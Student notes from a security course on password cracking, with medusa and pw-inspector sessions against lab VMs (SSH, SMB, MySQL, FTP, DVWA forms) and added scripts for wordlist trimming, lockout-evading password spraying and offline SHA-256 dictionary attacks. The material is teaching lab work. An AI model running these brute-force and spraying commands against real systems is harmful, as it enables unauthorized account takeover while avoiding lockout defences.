|
Online password cracking: hydra
pw-inspector
- trims a dictionary by password length and character set, so only candidates that can satisfy the target's password policy are tried
- pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l (keep only words containing lowercase letters)
- pw-inspector -i /usr/share/wordlists/nmap.lst -o P.lst -u (keep only words containing uppercase letters)
What decides cracking efficiency
- password complexity (how often the dictionary hits)
- bandwidth, protocol, server performance, client performance
- lockout threshold
- maximum number of login requests per unit of time
|
root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l
root@K:~# cat /usr/share/wordlists/nmap.lst
root@K:~# more p.lst
root@K:~# pw-inspector
PW-Inspector v0.2 (c) 2005 by van Hauser / THC vh@thc.org [http://www.thc.org]
Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s
Options:
-i FILE file to read passwords from (default: stdin)
-o FILE file to write valid passwords to (default: stdout)
-m MINLEN minimum length of a valid password
-M MAXLEN maximum length of a valid password
-c MINSETS the minimum number of sets required (default: all given)
Sets:
-l lowcase characters (a,b,c,d, etc.)
-u upcase characters (A,B,C,D, etc.)
-n numbers (1,2,3,4, etc.)
-p printable characters (which are not -l/-u/-n, e.g. $,!,/,(,*, etc.)
-s special characters - all others not within the sets above
PW-Inspector reads passwords in and prints those which meet the requirements.
The return code is the number of valid passwords found, 0 if none was found.
Use for security: check passwords, if 0 is returned, reject password choice.
Use for hacking: trim your dictionary file to the pw requirements of the target.
Usage only allowed for legal purposes.
root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l -m 3 -M 5
root@K:~# more p.lst
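The filtering pw-inspector performs is simple enough to reproduce with POSIX tools, which makes the policy explicit and lets you check a single candidate the way the tool's "return code" usage describes. This is an added example, not part of the course notes or of THC's pw-inspector; the wordlist is constructed here (the first line imitates the "#!comment:" header lines of nmap.lst, which must be stripped before the file is fed to a cracker), and only the -l/-u/-n/-p sets with -m/-M length bounds are modelled, not -c.

```shell
#!/bin/sh
# Added example: pw-inspector-style dictionary trimming with grep and awk.
# Nothing here is from the course notes or the THC tool; the word list is constructed.

# Constructed sample dictionary, nmap.lst style (comment line first).
sample_wordlist() {
    cat <<'EOF'
#!comment: constructed header line in the style of nmap.lst
123456
password
Passw0rd
abc123
qwertyuiop
letmein1
!@#$%^
Summer2016
p
EOF
}

# strip_comments < words: drop "#..." lines. Note the quoting: in an interactive
# bash, an unquoted `grep -v #` loses the pattern because # opens a comment.
strip_comments() {
    grep -v '^#'
}

# policy_filter MIN MAX SETS < words: keep words whose length is MIN..MAX and
# that contain every class named in SETS (l lowercase, u uppercase, n digit,
# p punctuation). Equivalent to pw-inspector -m MIN -M MAX plus the set flags,
# with all given sets required (the tool's default for -c).
policy_filter() {
    LC_ALL=C awk -v min="$1" -v max="$2" -v sets="$3" '
        length($0) < min || length($0) > max { next }
        index(sets, "l") && $0 !~ /[a-z]/        { next }
        index(sets, "u") && $0 !~ /[A-Z]/        { next }
        index(sets, "n") && $0 !~ /[0-9]/        { next }
        index(sets, "p") && $0 !~ /[^a-zA-Z0-9]/ { next }
        { print }'
}

# trimmed_count MIN MAX SETS: how many candidates survive the policy
# (pw-inspector reports this number as its exit status; here it is printed).
trimmed_count() {
    sample_wordlist | strip_comments | policy_filter "$1" "$2" "$3" | wc -l | tr -d ' '
}

# password_allowed WORD MIN MAX SETS: the "use for security" case from the
# tool's help text; succeeds only if WORD meets the policy.
password_allowed() {
    printf '%s\n' "$1" | policy_filter "$2" "$3" "$4" | grep -q .
}

# Trim to what a "6-10 chars, letters and digits" policy could accept:
trimmed_count 6 10 ln
```

The same two-step pattern applies to the real wordlist: `grep -v '^#' /usr/share/wordlists/nmap.lst | policy_filter 6 10 ln > pass.lst`. Trimming matters more than it looks when a lockout threshold is in play: every candidate that cannot possibly match still consumes one of the attempts you are allowed before the account locks.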
|
Online password cracking: medusa
Hydra's weaknesses (as characterised by the course)
- poor stability; the program crashes often
- poor rate control, so it easily trips service blocking or account lockout
- a new process per host and a new instance per service
- poor performance when cracking large numbers of targets
Medusa's characteristics
- stable
- well-behaved rate control
- thread-based
- fewer modules than hydra (no RDP module; the -d listing below also shows no ssh.mod, since the SSH module is only built when libssh2 is available, so check -d before relying on -M ssh)
- web-form support is flawed (in the DVWA run below the login answers with a 302 redirect and the module reports it as an error instead of evaluating DENY-SIGNAL)
|
root@k:~# medusa -h
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
medusa: option requires an argument -- 'h'
CRITICAL: Unknown error processing command-line options.
ALERT: Host information must be supplied.
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-c [NUM] : Time to wait in usec to verify socket is available (default 500 usec).
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [TEXT] : Resume scan based on map of previous scan
root@k:~# medusa -d
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
Available modules in "." :
Available modules in "/usr/lib/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
+ http.mod : Brute force module for HTTP : version 2.1
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1
+ smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1
+ svn.mod : Brute force module for Subversion sessions : version 2.1
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.1
+ web-form.mod : Brute force module for web forms : version 2.1
+ wrapper.mod : Generic Wrapper Module : version 2.0
|
Online password cracking: medusa
medusa -d
Cracking Windows passwords
- medusa -M smbnt -h 1.1.1.1 -u administrator -P pass.lst -e ns -F
Cracking Linux SSH passwords
- medusa -M ssh -h 192.168.20.10 -u root -P pass.lst -e ns -F
Other services
- medusa -M mysql -h 1.1.1.1 -u root -P pass.lst -e ns -F
- medusa -h 1.1.1.1 -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pas=password&Login=Login"
  (-e ns additionally tries an empty password and the username as the password; the web-form module fills the first two FORM-DATA fields with the username and password under test, so the field names must match the target form's, which for DVWA's login.php are username and password)
|
msfadmin@metasploitable:~$ sudo passwd root
[sudo] password for msfadmin:
Enter new UNIX password:
Retype new UNIX password:
No password supplied
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -F -u root -P /usr/share/wordlists/nmap.lst
root@K:~# grep 1234 /usr/share/wordlists/nmap.lst
root@K:~# grep '^1234$' /usr/share/wordlists/nmap.lst
root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v '^#'
root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v '^#' > pass.lst
root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -f -u root -P pass.lst
The Windows XP machine's IP address is 192.168.1.118
C:\> net user administrator zipper
root@K:~# medusa -M smbnt -h 192.168.1.118 -u administrator -P pass.lst -e ns -f
root@K:~# nmap -p3306 192.168.1.113
Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-21 23:00 CST
Nmap scan report for 192.168.1.113
Host is up (0.00036s latency).
PORT     STATE SERVICE
3306/tcp open  mysql
MAC Address: 08:00:27:B0:3A:76 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
root@K:~# medusa -M mysql -h 192.168.1.113 -e ns -F -u root -P pass.lst
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [mysql] Host: 192.168.1.113 (1 of 1, 0 complete) User: root (1 of 5000 complete) Password: (1 of 5000 complete)
ACCOUNT CHECK: [mysql] Host: 192.168.1.113 User: root Password: [SUCCESS]
root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst
root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst -n 2121
root@K:~# medusa -h 192.168.1.113 -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pas=password&Login=Login"
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ERROR: The answer was NOT successfully received, understood, and accepted while trying admin 123456: error code 302
ACCOUNT CHECK: [web-form] Host: 192.168.1.113 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 123456 (1 of 4998 complete)
root@K:~# medusa -M web-form -q
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
web-form.mod (2.1) Luciano Bello <luciano@linux.org.ar> :: Brute force module for web forms
Available module options:
USER-AGENT:? User-agent value. Default: "I'm not Mozilla, I'm Ming Mong".
FORM:? Target form to request. Default: "/"
DENY-SIGNAL:? Authentication failure message. Attempt flagged as successful if text is not present in
server response. Default: "Login incorrect"
CUSTOM-HEADER:? Custom HTTP header.
More headers can be defined by using this option several times.
FORM-DATA:<METHOD>?<FIELDS>
Methods and fields to send to web service. Valid methods are GET and POST. The actual form
data to be submitted should also be defined here. Specifically, the fields: username and
password. The username field must be the first, followed by the password field.
Default: "post?username=&password="
Usage example: "-M web-form -m USER-AGENT:"g3rg3 gerg" -m FORM:"webmail/index.php" -m DENY-SIGNAL:"deny!"
-m FORM-DATA:"post?user=&pass=&submit=True" -m CUSTOM-HEADER:"Cookie: name=value"
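Every Medusa run in this transcript takes one user and throws the whole of pass.lst at it, which is the worst possible order against the lockout threshold listed under cracking efficiency: by default Medusa exhausts all passwords for one user before moving to the next, so a single account absorbs every failed attempt. The usual answer is password spraying: one Medusa invocation per candidate password with -U for the user list, so each account sees one attempt per round, and a pause between rounds that outlasts the lockout observation window. The script below is an added example, not part of the notes or of the Medusa project; the target address, user list file name, threshold and window are placeholders, and DRY_RUN=1 (the default) prints the commands instead of executing them.

```shell
#!/bin/sh
# Added example: lockout-aware password spraying driven from the shell.
# Not from the course notes or the Medusa project; host/file names are placeholders.

TARGET=${TARGET:-192.168.1.118}     # placeholder: the notes' XP lab host
USERS_FILE=${USERS_FILE:-users.lst} # placeholder: one username per line
MEDUSA=${MEDUSA:-medusa}
DRY_RUN=${DRY_RUN:-1}               # 1 = print the commands, do not run them

# round_cmd PASSWORD: the Medusa command for one spray round. -t 1 and -T 1
# keep attempts serial so the per-account count stays predictable; -f stops
# the host as soon as a valid pair is found. -e n/-e s is deliberately not
# used here: it would add hidden extra attempts per account to the budget.
round_cmd() {
    printf '%s -M smbnt -h %s -U %s -p %s -t 1 -T 1 -f\n' \
        "$MEDUSA" "$TARGET" "$USERS_FILE" "$1"
}

# run_round PASSWORD: execute the same command with proper quoting
# (a password containing spaces survives this, unlike re-splitting a string).
run_round() {
    "$MEDUSA" -M smbnt -h "$TARGET" -U "$USERS_FILE" -p "$1" -t 1 -T 1 -f
}

# rounds_allowed THRESHOLD: attempts we may spend per account inside one
# lockout window. One attempt is kept in reserve so a real user's own typo
# does not lock the account because of us. Assumes the counter resets per
# window, which is how threshold-plus-window policies normally behave.
rounds_allowed() {
    echo $(( $1 - 1 ))
}

# spray THRESHOLD WINDOW_SECONDS PASSWORD...: issue one round per password,
# sleeping out the window whenever the per-account budget is used up.
# Commands go to stdout (one line per round); progress notes go to stderr.
spray() {
    threshold=$1; window=$2; shift 2
    budget=$(rounds_allowed "$threshold")
    used=0
    for pw in "$@"; do
        if [ "$used" -ge "$budget" ]; then
            echo "# $budget attempts per account used; waiting ${window}s for the lockout window" >&2
            [ "$DRY_RUN" = 1 ] || sleep "$window"
            used=0
        fi
        round_cmd "$pw"
        [ "$DRY_RUN" = 1 ] || run_round "$pw"
        used=$(( used + 1 ))
    done
}

# Example plan: policy of 3 failures per 15 minutes, three seasonal candidates.
spray 3 900 Summer2016 Welcome1 Password1
```

Run with `DRY_RUN=0` once the plan looks right. The budget arithmetic only holds if every attempt against the target comes through this script; a parallel Hydra or a colleague's run against the same accounts shares the same counter on the server.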
|
Online password cracking: medusa
- -n : non-default port
- -s : use an SSL connection
- -T : number of hosts tested concurrently
medusa -M ftp -q
|
root@k:~# medusa -M ftp -q
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ftp.mod (2.1) pMonkey <pmonkey@foofus.net> :: Brute force module for FTP/FTPS sessions
Available module options:
MODE:? (NORMAL*, EXPLICIT, IMPLICIT)
EXPLICIT: AUTH TLS Mode as defined in RFC 4217
Explicit FTPS (FTP/SSL) connects to a FTP service in the clear. Prior to
sending any credentials, however, an "AUTH TLS" command is issued and a
SSL session is negotiated.
IMPLICIT: FTP over SSL (990/tcp)
Implicit FTPS requires a SSL handshake to be performed before any FTP
commands are sent. This service typically resides on tcp/990. If the user
specifies this option or uses the "-s" (SSL) option, the module will
default to this mode and tcp/990.
NORMAL
The default behaviour if no MODE is specified. Authentication is attempted
in the clear. If the server requests encryption for the given user,
Explicit FTPS is utilized.
Example Usage:
medusa -M ftp -h host -u username -p password
medusa -M ftp -s -h host -u username -p password
medusa -M ftp -m MODE:EXPLICIT -h host -u username -p password
(*) Default value
|
Offline password cracking
Authentication
- never transmit the password in cleartext
- each authentication transmits a hash derived from the password rather than the password itself (a hash is cheap to compute and infeasible to invert; hashing is not encryption, there is no key to decrypt with)
- the server-side user database should store passwords salted and hashed, never in the clear
Cracking approach
- sniff the password hash off the wire
- or exploit a vulnerability to log in to the server and pull the hashes from the user database
- identify the hash type
  by length and character set
- use an offline cracking tool to collide candidate passwords against the hash
|
|
Offline password cracking
Advantages
- working offline never triggers a password lockout mechanism
- it produces no flood of failed-login log entries to draw an administrator's attention
Hash identification tools
- hash-identifier
- hashid
- both can misidentify a hash or fail to identify it (a 32-character hex string is MD5, NTLM or LM by length alone; only context such as where it was captured settles it)
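The two steps above, identify the hash and collide candidates against it, are small enough to show in full. The script below is an added example, not part of the notes, hash-identifier or hashid: hash_guess applies the same length-and-charset reasoning those tools use and deliberately reports every family a raw hex digest could belong to, which is the ambiguity the notes warn about; crack_sha256 then runs a constructed wordlist against an unsalted SHA-256 digest and against a salted one. The salt value and the salted digest are constructed here to stand in for what a server would store; the unsalted target is the well-known SHA-256 of "password".

```shell
#!/bin/sh
# Added example: hash identification by length/charset and an offline
# dictionary attack with sha256sum. Not from the course notes or any named tool.

# hash_guess HASH: print the family, or every family a bare hex digest could be.
# Crypt-style prefixes are unambiguous; raw hex digests are not.
hash_guess() {
    h=$1
    case $h in
        '$1$'*) echo 'md5crypt' ;;
        '$5$'*) echo 'sha256crypt' ;;
        '$6$'*) echo 'sha512crypt' ;;
        '$2a$'*|'$2b$'*|'$2y$'*) echo 'bcrypt' ;;
        *)
            if printf '%s' "$h" | LC_ALL=C grep -qE '^[0-9a-fA-F]+$'; then
                case ${#h} in
                    32)  echo 'md5|ntlm|lm|md4 (128-bit hex, ambiguous)' ;;
                    40)  echo 'sha1|ripemd160 (160-bit hex, ambiguous)' ;;
                    64)  echo 'sha256|sha3-256 (256-bit hex, ambiguous)' ;;
                    128) echo 'sha512|sha3-512 (512-bit hex, ambiguous)' ;;
                    *)   echo "unknown hex digest (${#h} chars)" ;;
                esac
            else
                echo 'unknown'
            fi ;;
    esac
}

# sha256_hex STRING: lowercase hex digest, coreutils or BSD tool.
sha256_hex() {
    if command -v sha256sum >/dev/null 2>&1; then
        printf '%s' "$1" | sha256sum | cut -d' ' -f1
    else
        printf '%s' "$1" | shasum -a 256 | cut -d' ' -f1
    fi
}

# crack_sha256 HASH [SALT] < wordlist: print the first word whose SHA-256
# (of SALT+word when a salt is given) equals HASH; exit 1 if none matches.
crack_sha256() {
    target=$1; salt=${2-}
    while IFS= read -r w; do
        [ -n "$w" ] || continue
        if [ "$(sha256_hex "$salt$w")" = "$target" ]; then
            printf '%s\n' "$w"
            return 0
        fi
    done
    return 1
}

# Constructed wordlist.
sample_words() {
    printf '%s\n' 123456 password letmein Summer2016 qwerty
}

# Well-known SHA-256 of "password" (unsalted storage).
UNSALTED_HASH=5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
# Constructed per-user salt and the digest a server would store for "letmein".
SALT=s4lt
SALTED_HASH=$(sha256_hex "${SALT}letmein")

hash_guess "$UNSALTED_HASH"
sample_words | crack_sha256 "$UNSALTED_HASH"            # hits: password
sample_words | crack_sha256 "$SALTED_HASH" "$SALT"      # hits: letmein
sample_words | crack_sha256 "$SALTED_HASH" || echo 'no hit without the salt'
```

The last two calls are the point of the notes' "store salted" item: the same wordlist finds the salted password only when the attacker also has the salt, and every distinct salt forces the whole wordlist to be rehashed again, so one precomputed table no longer serves every user.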
|
Firefox add-on: hashr
These notes were taken by a student of the 安全牛课堂 (Aqniu Classroom) course; the course itself and related information-security material are available at 安全牛课堂.
|